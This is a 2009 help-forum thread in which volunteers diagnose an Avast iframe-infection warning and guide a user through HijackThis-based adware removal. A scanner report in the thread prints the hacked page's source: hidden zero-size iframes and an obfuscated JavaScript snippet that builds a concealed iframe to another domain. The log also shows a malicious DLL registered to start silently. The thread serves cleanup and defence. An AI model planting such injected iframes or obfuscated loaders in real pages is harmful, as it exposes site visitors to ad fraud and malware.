Virus not being found by scan question...

I have run a scan several times, but cannot seem to find the source of this virus that continues to pop up on my computer. Avast comes up and says that the File name is http://www.goasks.com/ads.htm… Malware name: HTML:lframe-inf… Malware type: Virus/Worm… VPS version: 090413-0, 04/13/2009 the avast warning comes up at least 15 times a day and I do not know how to delete it. Can anyone help me??

Welcome to the forum.

It sounds like it’s the webscanner telling you that the website you’re visiting has a mis-formed iframe tag in it.

Are you visiting a website when this pops up?

It is basically saying this site has been hacked or has malicious content, that particular page it just chock-a-block with iframe tags with at least one going to a suspect/malicious site.

It also uses obfuscation to try and hide one site that it is connecting to, which in its own right makes me suspicious.

Hi turtlegk33,

The Bad Stuff Detektor came up with the following report:

Zeroiframes detected: 36
Check took 64.33 seconds

(Level: 0) Url checked:
hxxp://www.goasks.com/ads.htm
Advpoints code detected! (iframe cheater)
Zeroiframes detected on this site: 11

(Level: 1) Url checked: (iframe source)
hxxp://www.searchbizs.com/myport.php?ref=801006
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.searchbizs.com/portal/portal1.php?ref=801006
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://www.onlinebizs.com/myport.php?ref=1187
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.onlinebizs.com/portal/portal1.php?ref=1187
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://www.abcseeking.com/myport.php?ref=7676
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.abcseeking.com/portal/portal1.php?ref=7676
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://www.abczones.com/myport.php?ref=vg30
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.abczones.com/portal/portal1.php?ref=vg30
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://www.abcwant.com/myport.php?ref=6767
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.abcwant.com/portal/portal1.php?ref=6767
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://www.xmlsee.com/myport.php?ref=utad49
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.xmlsee.com/portal/portal1.php?ref=utad49
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://www.advpoints.com/promote15.php?uid=11278
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://www.eseekz.com/ppc.php?username=skpc
Zeroiframes detected on this site: 4
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.eseekz.com/about:blank
Blank page / could not connect
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.eseekz.com/about:blank
Blank page / could not connect
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.hitreap.com/search.php?username=jack&keywords=safety+glasses&abcwords=currency+trading
Zeroiframes detected on this site: 4
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.hitreap.com/about:blank
Blank page / could not connect
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.hitreap.com/about:blank
Blank page / could not connect
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.hitreap.com/about:blank
Blank page / could not connect
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.hitreap.com/about:blank
Blank page / could not connect
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.eseekz.com/search.php?username=skpc&keywords=heroin+detox&abcwords=credit+card+debt
Zeroiframes detected on this site: 4
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.eseekz.com/about:blank
Blank page / could not connect
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.eseekz.com/about:blank
Blank page / could not connect
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.eseekz.com/about:blank
Blank page / could not connect
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.eseekz.com/about:blank
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://thebighits.com/?id=e2061
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://www.resultsz.com/search/anticheat.php?username=hadit777&s=e2061&type=2
Zeroiframes detected on this site: 2
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.theshoppingdirect.com/?keywords=florist+flower
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.seekingdirect.com/index.php?username=akuler&k=caviar
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (script source)
hxxp://s10.histats.com/js9.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (script source)
hxxp://s+st_dominio+.histats.com/stats/0.php?+send_vars+&
Blank page / could not connect
No ad codes identified

(Level: 3) Url checked: (script source)
hxxp://s+st_dominio+.histats.com/stats/+s_sid+.php?+send_vars+&
Blank page / could not connect
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://host.justppc.net/search/a.php?aff=8819
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 2) Url checked: (iframe source)
hxxp://host.justppc.net/b.php
Advpoints code detected! (iframe cheater)
Zeroiframes detected on this site: 3

(Level: 3) Url checked: (iframe source)
hxxp://j10.justppc.net/sea.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 4) Url checked: (frame source)
hxxp://j10.justppc.net/cgi-bin/search/search.cgi?keywords=structured+settlement&username=xiaoke
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 4) Url checked: (frame source)
hxxp://j10.justppc.net/g1.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://j29.justppc.net/sea.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 4) Url checked: (frame source)
hxxp://j29.justppc.net/cgi-bin/search/search.cgi?keywords=meridia&username=17888
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 4) Url checked: (frame source)
hxxp://j29.justppc.net/g1.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://www.advpoints.com/promote15f.php?uid=10509
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 4) Url checked: (iframe source)
hxxp://www.advpoints.com/itsptp.html
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 5) Url checked: (script source)
hxxp://www.advpoints.com/rollover.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 5) Url checked: (script source)
hxxp://www.google-analytics.com/urchin.js
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 4) Url checked: (iframe source)
hxxp://www.advpoints.com/promote.php?uid=10509
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 1) Url checked: (iframe source)
hxxp://feedsearchs.com/portal/?ref=20tra
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (frame source)
hxxp://feedsearchs.com/portal/a.php
Zeroiframes detected on this site: 1
No ad codes identified

(Level: 3) Url checked: (iframe source)
hxxp://i-e-search.com/portal/?ref=3
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 4) Url checked: (frame source)
hxxp://i-e-search.com/portal/a.php
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 4) Url checked: (frame source)
hxxp://i-e-search.com/portal/portal.php?ref=3
Zeroiframes detected on this site: 0
No ad codes identified

(Level: 2) Url checked: (frame source)
hxxp://feedsearchs.com/portal/portal.php?ref=20tra
Zeroiframes detected on this site: 0
No ad codes identified


Source code of submitted URL:
<iframe width="0" height="0" scrolling=no src="hxxp://www.searchbizs.com/myport.php?ref=801006"></iframe>
<iframe width="0" height="0" scrolling=no src="hxxp://www.onlinebizs.com/myport.php?ref=1187"></iframe>
<iframe width="0" height="0" scrolling=no src="hxxp://www.abcseeking.com/myport.php?ref=7676"></iframe>
<iframe width="0" height="0" scrolling=no src="hxxp://www.abczones.com/myport.php?ref=vg30"></iframe>
<iframe width="0" height="0" scrolling=no src="hxxp://www.abcwant.com/myport.php?ref=6767"></iframe>
<iframe src="hxxp://www.xmlsee.com/myport.php?ref=utad49" width="0" height="0" scrolling=no"></iframe>
<iframe width=0 height=0 src='hxxp://www.advpoints.com/promote15.php?uid=11278' frameborder=0 marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe>
<iframe src="hxxp://www.eseekz.com/ppc.php?username=skpc" width="0" height="0" frameborder="0" scrolling="no">Your browser does not support IFRAME</iframe>
<iframe src="hxxp://thebighits.com/?id=e2061" width="0" height="0" border="0" scrolling=no></iframe>
<script type=text/javascript>
a3="3000";
a1='http://';
a2='be';
c_b = a1 + a2 + 'e8' + '.info/' + 'm.php?p=' + a3;
document.write('<if' + 'rame src="' + c_b + '" width=1"'+'" height=1"'+'" frameborder="0" scrolling="no"></if'+'rame>');
</script>
<iframe src=hxxp://host.justppc.net/search/a.php?aff=8819 width=0 height=0></iframe>
<IFRAME src="hxxp://feedsearchs.com/portal/?ref=20tra" width=0 height=0 scrolling=no></IFRAME>

Obvious verdict I think,

polonus

Thanks for the welcome…

It does come up when I am visiting websites, but it also comes up quite frequently when I have iTunes up and am listening to music and sometimes I am not doing anything on the computer but when I come back to the computer three or four may have come up…

What does what the Bad Stuff Detektor said actually mean… sorry

Hi turtlegk33,

These were the results of an specific scanner I use where one can scan a specific URL against IFrame hacks in particular, and I scanned the URL you gave to come up with the foregoing results, the man who developed this scanner called it the Bad Stuff Detektor, his name is Jukaty.

polonus

Is there anything I can do to stop this from continually popping up?

Do a scan with Hijack This. Be sure to click “Do a system scan and a save log file.”. When the log appears, copy the text in the notepad document and paste it in your next post. Then we can see if you have any “HIDDEN” prosesses that are trying to connect to that site.

If you don’t have Hijack This, download it here: http://www.trendsecure.com/portal/en-US/tools/security_tools/hijackthis/download

Help us so we can help you.

First half of info:…

Logfile of Trend Micro HijackThis v2.0.2
Scan saved at 4:45:13 PM, on 4/21/2009
Platform: Windows Vista SP1 (WinNT 6.00.1905)
MSIE: Internet Explorer v8.00 (8.00.6001.18702)
Boot mode: Normal

Running processes:
C:\Windows\system32\taskeng.exe
C:\Windows\system32\Dwm.exe
C:\Windows\Explorer.EXE
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Apoint\Apoint.exe
C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
C:\Program Files\Common Files\Symantec Shared\ccApp.exe
C:\Program Files\Symantec AntiVirus\VPTray.exe
C:\Program Files\Windows Media Player\wmpnscfg.exe
C:\Windows\sttray.exe
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\Lexmark 1200 Series\LXCZbmgr.exe
C:\Windows\system32\wbem\unsecapp.exe
C:\Program Files\Adobe\Acrobat 9.0\Acrobat\acrotray.exe
C:\Program Files\Alwil Software\Avast4\ashDisp.exe
C:\Program Files\BOINC\boinctray.exe
C:\Program Files\Java\jre6\bin\jusched.exe
C:\Program Files\iTunes\iTunesHelper.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\AIM6\aim6.exe
C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
C:\Program Files\RocketDock\RocketDock.exe
C:\Program Files\BOINC\boincmgr.exe
C:\Windows\System32\rundll32.exe
C:\Program Files\Lexmark 1200 Series\lxczbmon.exe
C:\Program Files\Digital Line Detect\DLG.exe
C:\Program Files\Dell\QuickSet\quickset.exe
C:\Program Files\Apoint\ApMsgFwd.exe
C:\Program Files\Windows Sidebar\sidebar.exe
C:\Program Files\Apoint\Apntex.exe
C:\Program Files\Apoint\HidFind.exe
C:\Program Files\BOINC\boinc.exe
C:\Program Files\AIM6\aolsoftware.exe
C:\ProgramData\BOINC\projects\www.worldcommunitygrid.org\wcg_faah_autodock_6.07_windows_intelx86
C:\ProgramData\BOINC\projects\www.worldcommunitygrid.org\wcg_faah_autodock_6.07_windows_intelx86
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Windows Live\Toolbar\wltuser.exe
C:\Windows\System32\regsvr32.exe
C:\Program Files\Internet Explorer\iexplore.exe
C:\Program Files\Mozilla Firefox\firefox.exe
C:\Windows\system32\SearchFilterHost.exe
C:\Program Files\Trend Micro\HijackThis\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://www.westminster.edu/?page=current
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = http://go.microsoft.com/fwlink/?LinkId=69157
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = http://go.microsoft.com/fwlink/?LinkId=54896
R1 - HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = http://go.microsoft.com/fwlink/?LinkId=54896
R0 - HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = http://go.microsoft.com/fwlink/?LinkId=69157
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = 
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = 
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Window Title = Internet Explorer provided by Dell
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyOverride = *.local
R0 - HKCU\Software\Microsoft\Internet Explorer\Toolbar,LinksFolderName = 
O1 - Hosts: ::1 localhost
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelper.dll
O2 - BHO: ContributeBHO Class - {074C1DC5-9320-4A9A-947D-C042949C6216} - C:\Program Files\Adobe\/Adobe Contribute CS4/contributeieplugin.dll
O2 - BHO: AcroIEHelperStub - {18DF081C-E8AD-4283-A596-FA578C2EBDC3} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEHelperShim.dll
O2 - BHO: Spybot-S&D IE Protection - {53707962-6F74-2D53-2644-206D7942484F} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O2 - BHO: (no name) - {5C255C8A-E604-49b4-9D64-90988571CECB} - (no file)
O2 - BHO: Search Helper - {6EBF7485-159F-4bff-A14F-B9E3AAC4465B} - C:\Program Files\Microsoft\Search Enhancement Pack\Search Helper\SearchHelper.dll
O2 - BHO: Windows Live Sign-in Helper - {9030D464-4C02-4ABF-8ECC-5164760863C6} - C:\Program Files\Common Files\Microsoft Shared\Windows Live\WindowsLiveLogin.dll
O2 - BHO: Adobe PDF Conversion Toolbar Helper - {AE7CD045-E861-484f-8273-0445EE161910} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
O2 - BHO: cpmsky browser enhancer - {B3E68FB2-BFC4-6990-21C4-2C2D28DF79CE} - C:\Windows\system32\qqeckpckcni.dll
O2 - BHO: Browser Address Error Redirector - {CA6319C0-31B7-401E-A518-A07C3DB8F777} - C:\Program Files\BAE\BAE.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Program Files\Java\jre6\bin\jp2ssv.dll
O2 - BHO: Windows Live Toolbar Helper - {E15A8DC0-8516-42A1-81EA-DC94EC1ACF10} - C:\Program Files\Windows Live\Toolbar\wltcore.dll
O2 - BHO: SmartSelect - {F4971EE7-DAA0-4053-9964-665D8EE6A077} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
O3 - Toolbar: Adobe PDF - {47833539-D0C5-4125-9FA8-0819E2EAAC93} - C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll
O3 - Toolbar: Contribute Toolbar - {517BDDE4-E3A7-4570-B21E-2B52B6139FC7} - C:\Program Files\Adobe\/Adobe Contribute CS4/contributeieplugin.dll
O3 - Toolbar: &Windows Live Toolbar - {21FA44EF-376D-4D53-9B0F-8A89D3229068} - C:\Program Files\Windows Live\Toolbar\wltcore.dll
O4 - HKLM\..\Run: [Windows Defender] %ProgramFiles%\Windows Defender\MSASCui.exe -hide
O4 - HKLM\..\Run: [Apoint] C:\Program Files\Apoint\Apoint.exe
O4 - HKLM\..\Run: [ISUSScheduler] "C:\Program Files\Common Files\InstallShield\UpdateService\issch.exe" -start
O4 - HKLM\..\Run: [PDVDDXSrv] "C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe"
O4 - HKLM\..\Run: [ccApp] "C:\Program Files\Common Files\Symantec Shared\ccApp.exe"
O4 - HKLM\..\Run: [vptray] C:\PROGRA~1\SYMANT~1\VPTray.exe
O4 - HKLM\..\Run: [Performance Center] C:\Program Files\Ascentive\Performance Center\APCMain.exe -m
O4 - HKLM\..\Run: [MSConfig] "C:\Windows\system32\msconfig.exe" /auto
O4 - HKLM\..\Run: [AppleSyncNotifier] C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleSyncNotifier.exe
O4 - HKLM\..\Run: [SigmatelSysTrayApp] sttray.exe
O4 - HKLM\..\Run: [NvSvc] RUNDLL32.EXE C:\Windows\system32\nvsvc.dll,nvsvcStart
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\Windows\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\Run: [NvMediaCenter] RUNDLL32.EXE C:\Windows\system32\NvMcTray.dll,NvTaskbarInit
O4 - HKLM\..\Run: [NVHotkey] rundll32.exe C:\Windows\system32\nvHotkey.dll,Start

Second half:…


O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 8.0\Reader\Reader_sl.exe"
O4 - HKLM\..\Run: [lxczbmgr.exe] "C:\Program Files\Lexmark 1200 Series\lxczbmgr.exe"
O4 - HKLM\..\Run: [FaxCenterServer] "C:\Program Files\Lexmark Fax Solutions\fm3032.exe" /s
O4 - HKLM\..\Run: [AdobeCS4ServiceManager] "C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe" -launchedbylogin
O4 - HKLM\..\Run: [Adobe Acrobat Speed Launcher] "C:\Program Files\Adobe\Acrobat 9.0\Acrobat\Acrobat_sl.exe"
O4 - HKLM\..\Run: [Acrobat Assistant 8.0] "C:\Program Files\Adobe\Acrobat 9.0\Acrobat\Acrotray.exe"
O4 - HKLM\..\Run: [Adobe_ID0ENQBO] C:\PROGRA~1\COMMON~1\Adobe\ADOBEV~1\Server\bin\VERSIO~2.EXE
O4 - HKLM\..\Run: [avast!] C:\PROGRA~1\ALWILS~1\Avast4\ashDisp.exe
O4 - HKLM\..\Run: [boinctray] "C:\Program Files\BOINC\boinctray.exe"
O4 - HKLM\..\Run: [xbthkmizjbfdfj] C:\Windows\System32\regsvr32.exe /s "C:\Windows\system32\qqeckpckcni.dll"
O4 - HKLM\..\Run: [QuickTime Task] "C:\Program Files\QuickTime\QTTask.exe" -atboottime
O4 - HKLM\..\Run: [SunJavaUpdateSched] "C:\Program Files\Java\jre6\bin\jusched.exe"
O4 - HKLM\..\Run: [iTunesHelper] "C:\Program Files\iTunes\iTunesHelper.exe"
O4 - HKCU\..\Run: [Sidebar] C:\Program Files\Windows Sidebar\sidebar.exe /autoRun
O4 - HKCU\..\Run: [Aim6] "C:\Program Files\AIM6\aim6.exe" /d locale=en-US ee://aol/imApp
O4 - HKCU\..\Run: [AIM] C:\Program Files\AIM95\aim.exe -cnetwait.odl
O4 - HKCU\..\Run: [updateMgr] C:\Program Files\Adobe\Acrobat 7.0\Reader\AdobeUpdateManager.exe AcRdB7_0_5
O4 - HKCU\..\Run: [XNeat Windows Manager] C:\Program Files\XNeat Windows Manager\xnViewer.exe /h
O4 - HKCU\..\Run: [SpybotSD TeaTimer] C:\Program Files\Spybot - Search & Destroy\TeaTimer.exe
O4 - HKCU\..\Run: [RocketDock] "C:\Program Files\RocketDock\RocketDock.exe"
O4 - HKCU\..\Run: [boincmgr] "C:\Program Files\BOINC\boincmgr.exe" /a /s
O4 - HKCU\..\Run: [msnmsgr] "C:\Program Files\Windows Live\Messenger\msnmsgr.exe" /background
O4 - HKCU\..\Run: [WMPNSCFG] C:\Program Files\Windows Media Player\WMPNSCFG.exe
O4 - HKUS\S-1-5-19\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-19\..\Run: [WindowsWelcomeCenter] rundll32.exe oobefldr.dll,ShowWelcomeCenter (User 'LOCAL SERVICE')
O4 - HKUS\S-1-5-20\..\Run: [Sidebar] %ProgramFiles%\Windows Sidebar\Sidebar.exe /detectMem (User 'NETWORK SERVICE')
O4 - Global Startup: Digital Line Detect.lnk = C:\Program Files\Digital Line Detect\DLG.exe
O4 - Global Startup: Microsoft Office.lnk = C:\Program Files\Microsoft Office\Office10\OSA.EXE
O4 - Global Startup: QuickSet.lnk = ?
O8 - Extra context menu item: Append Link Target to Existing PDF - res://C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppendSelLinks.html
O8 - Extra context menu item: Append to Existing PDF - res://C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIEAppend.html
O8 - Extra context menu item: Convert Link Target to Adobe PDF - res://C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECaptureSelLinks.html
O8 - Extra context menu item: Convert to Adobe PDF - res://C:\Program Files\Common Files\Adobe\Acrobat\ActiveX\AcroIEFavClient.dll/AcroIECapture.html
O8 - Extra context menu item: E&xport to Microsoft Excel - res://C:\PROGRA~1\MICROS~1\Office12\EXCEL.EXE/3000
O9 - Extra button: Blog This - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra 'Tools' menuitem: &Blog This in Windows Live Writer - {219C3416-8CB2-491a-A3C7-D9FCDDC9D600} - C:\Program Files\Windows Live\Writer\WriterBrowserExtension.dll
O9 - Extra button: Research - {92780B25-18CC-41C8-B9BE-3C9C571A8263} - C:\PROGRA~1\MICROS~1\Office12\REFIEBAR.DLL
O9 - Extra button: AOL Instant Messenger (TM) - {AC9E2541-2814-11d5-BC6D-00B0D0A1DE45} - C:\PROGRA~1\AIM95\aim.exe (file missing)
O9 - Extra button: Run IMVU - {d9288080-1baa-4bc4-9cf8-a92d743db949} - C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\IMVU\Run IMVU.lnk (file missing)
O9 - Extra button: (no name) - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O9 - Extra 'Tools' menuitem: Spybot - Search && Destroy Configuration - {DFB852A3-47F8-48C4-A200-58CAB36FD2A2} - C:\Program Files\Spybot - Search & Destroy\SDHelper.dll
O13 - Gopher Prefix: 
O16 - DPF: {67DABFBF-D0AB-41FA-9C46-CC0F21721616} (DivXBrowserPlugin Object) - http://download.divx.com/player/DivXBrowserPlugin.cab
O16 - DPF: {DB7BF79A-FC51-4B5A-92BC-A65731174380} (InstantAction Game Launcher) - http://www.instantaction.com/download/iaplayer.cab
O23 - Service: Adobe Version Cue CS4 - Adobe Systems Incorporated - C:\Program Files\Common Files\Adobe\Adobe Version Cue CS4\Server\bin\VersionCueCS4.exe
O23 - Service: Apple Mobile Device - Apple Inc. - C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe
O23 - Service: avast! iAVS4 Control Service (aswUpdSv) - ALWIL Software - C:\Program Files\Alwil Software\Avast4\aswUpdSv.exe
O23 - Service: avast! Antivirus - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashServ.exe
O23 - Service: avast! Mail Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashMaiSv.exe
O23 - Service: avast! Web Scanner - ALWIL Software - C:\Program Files\Alwil Software\Avast4\ashWebSv.exe
O23 - Service: Bonjour Service - Apple Inc. - C:\Program Files\Bonjour\mDNSResponder.exe
O23 - Service: Symantec Event Manager (ccEvtMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
O23 - Service: Symantec Settings Manager (ccSetMgr) - Symantec Corporation - C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe
O23 - Service: Symantec AntiVirus Definition Watcher (DefWatch) - Symantec Corporation - C:\Program Files\Symantec AntiVirus\DefWatch.exe
O23 - Service: FLEXnet Licensing Service - Acresso Software Inc. - C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe
O23 - Service: iPod Service - Apple Inc. - C:\Program Files\iPod\bin\iPodService.exe
O23 - Service: LiveUpdate - Symantec Corporation - C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE
O23 - Service: lxcz_device -   - C:\Windows\system32\lxczcoms.exe
O23 - Service: Dell Internal Network Card Power Management (nicconfigsvc) - Dell Inc. - C:\Program Files\Dell\QuickSet\NicConfigSvc.exe
O23 - Service: SAVRoam (SavRoam) - symantec - C:\Program Files\Symantec AntiVirus\SavRoam.exe
O23 - Service: stllssvr - Unknown owner - C:\Program Files\Common Files\SureThing Shared\stllssvr.exe (file missing)
O23 - Service: Symantec AntiVirus - Symantec Corporation - C:\Program Files\Symantec AntiVirus\Rtvscan.exe
O23 - Service: Viewpoint Manager Service - Viewpoint Corporation - C:\Program Files\Viewpoint\Common\ViewpointService.exe
O23 - Service: XAudioService - Conexant Systems, Inc. - C:\Windows\system32\DRIVERS\xaudio.exe

--
End of file - 13628 bytes

As seen from your HJT logfile txt these two entries could be fixed:
O2 - BHO: cpmsky browser enhancer - {B3E68FB2-BFC4-6990-21C4-2C2D28DF79CE} - C:\Windows\system32\qqeckpckcni.dll

Unknown application. Re: http://www.daniweb.com/forums/thread145193.html

O4 - HKLM..\Run: [xbthkmizjbfdfj] C:\Windows\System32\regsvr32.exe /s “C:\Windows\system32\qqeckpckcni.dll” Nasty

This seems legit, but can you upload it to virustotal.com: xnViewer.exe
Furthermore you seem not to have an active software firewall running on that machine, so you expose yourself to additional risks,

polonus

O4 - HKLM..\Run: [xbthkmizjbfdfj] C:\Windows\System32\regsvr32.exe /s “C:\Windows\system32\qqeckpckcni.dll” Nasty

Ran the virus total on this file and it received a 0/40 for it being a virus.

Hi turtlegk33,

But this cpmsky browser enhancer, is adware malware for IE (not for firefox apparently), but you have to uninstall that with HJT in SafeMode, it is a trojan, no matter what virustotal says, this might be one of their new dll’s: qqeckpckcni.dll Get rid of it, it is a Browser Heper Object you do NOT need in Internet Explorer, it is notorious adware!
Also read the information where someone is helped to get rid of this crap:
http://www.bleepingcomputer.com/forums/lofiversion/index.php/t212644.html

polonus

O2 - BHO: cpmsky browser enhancer - {B3E68FB2-BFC4-6990-21C4-2C2D28DF79CE} - C:\Windows\system32\qqeckpckcni.dll

Was not needed to be done in safe mode…

O4 - HKLM..\Run: [xbthkmizjbfdfj] C:\Windows\System32\regsvr32.exe /s “C:\Windows\system32\qqeckpckcni.dll”

on the other hand was needed to be done in safe mode.

qqeckpckcni.dll

Is still in my system32. Does this have anything to do with the pop ups or with any other viruses that may be on my computer. If so can I just delete it or what should I do?

Hi turtlegk33.

First try this on it: http://www.xp-tools.com/winutilities/download.htm
BHOs (Browser Help Objects) are software that put a toolbar on Internet Explorer or otherwise integrates other software into it. Many (Acrobat Reader, Google Toolbar) are desirable. However, spyware companies also install BHOs on your computer. These can be difficult to remove. BHO Remover lists the BHOs that are currently installed. You can then remove those you don’t want to keep.

If that does not do the trick then get this anti-spyware scanner and do a full scan with it and post the scan report next, download from here:
http://www.malwarebytes.org/mbam-download.php

And if not fully sufficient try this:
http://www.mlin.net/files/StartupCPL_EXE.zip
Download Startup_CPL.exe from Mike Lin’s web site. This program will list multiple startup locations that launch programs when Windows is booted. If you see anything suspicious, disable it from launching in your startup. If you are unsure of whether or not a program entry is safe to disable, you can ask us here.

Else we have other things up our sleeves to get this critter off of your machine,
Also check whether you have C:\WINDOWS\system32\avtap.dll and then delete that as well.

Download OTMoveIt from here:
http://oldtimer.geekstogo.com/OTMoveIt3.exe
Give in at Paste instructions for items to be moved :

O4 - HKLM..\Run: [xbthkmizjbfdfj] C:\Windows\System32\regsvr32.exe /s “C:\Windows\system32\qqeckpckcni.dll”
and click on red MoveIt

polonus